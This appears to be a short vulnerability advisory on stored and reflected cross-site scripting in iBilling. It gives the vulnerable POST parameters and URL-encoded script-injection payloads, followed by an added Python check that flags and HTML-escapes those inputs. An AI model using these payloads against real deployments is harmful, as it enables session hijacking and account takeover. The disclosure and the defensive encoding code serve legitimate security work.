1. Cross Site Scripting (Stored):
http://localhost/ibilling/index.php
Parameters: msg, desc, account, phone, company, address, city, state, zip, tags, description, ref (POST)
Payload(s):
account=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&company=%22%3E%3Cscript%3Ealert(2)%3C%2Fscript%3E&email=test%40yahoo.com&phone=%22%3E%3Cscript%3Ealert(4)%3C%2Fscript%3E&address=%22%3E%3Cscript%3Ealert(5)%3C%2Fscript%3E&city=%22%3E%3Cscript%3Ealert(6)%3C%2Fscript%3E&state=%22%3E%3Cscript%3Ealert(7)%3C%2Fscript%3E&zip=%22%3E%3Cscript%3Ealert(8)%3C%2Fscript%3E&country=TR&tags%5B%5D=web_development%22%3E%3Cscript%3Ealert(9)%3C%2Fscript%3E

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

2. Cross Site Scripting (Reflected):
http://localhost/ibilling/index.php
Parameters: cid (POST)
Payload(s):
cid=1001">&msg=&icon=

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
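Added example (not part of the original advisory and not iBilling code): a defender-side check that decodes the POST bodies listed above, reports which fields carry characters able to break out of a quoted HTML attribute, and shows the output-encoded form that renders them inert. The function names `audit_form_body` and `render_input` are hypothetical, and Python stands in for the application's PHP, where `htmlspecialchars()` with `ENT_QUOTES` performs the same encoding.

```python
import html
from urllib.parse import parse_qsl

# Subset of the stored-XSS request body listed in the advisory above.
STORED_BODY = (
    "account=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E"
    "&email=test%40yahoo.com"
    "&zip=%22%3E%3Cscript%3Ealert(8)%3C%2Fscript%3E"
    "&country=TR"
    "&tags%5B%5D=web_development%22%3E%3Cscript%3Ealert(9)%3C%2Fscript%3E"
)

# Reflected-XSS request body exactly as it appears in the advisory above.
REFLECTED_BODY = 'cid=1001">&msg=&icon='

# Characters that can close a quoted attribute value or open a new tag.
BREAKOUT_CHARS = set("\"'<>")


def audit_form_body(body):
    """Map each field whose decoded value contains breakout characters
    to the HTML-encoded form that is safe to echo back into a page."""
    findings = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        if BREAKOUT_CHARS & set(value):
            findings[name] = html.escape(value, quote=True)
    return findings


def render_input(name, value):
    """Render a form field with output encoding applied to both the
    attribute name and the attribute value."""
    return '<input name="{}" value="{}">'.format(
        html.escape(name, quote=True), html.escape(value, quote=True)
    )


if __name__ == "__main__":
    for label, body in (("stored", STORED_BODY), ("reflected", REFLECTED_BODY)):
        for field, encoded in audit_form_body(body).items():
            print(label, field, "->", encoded)
```
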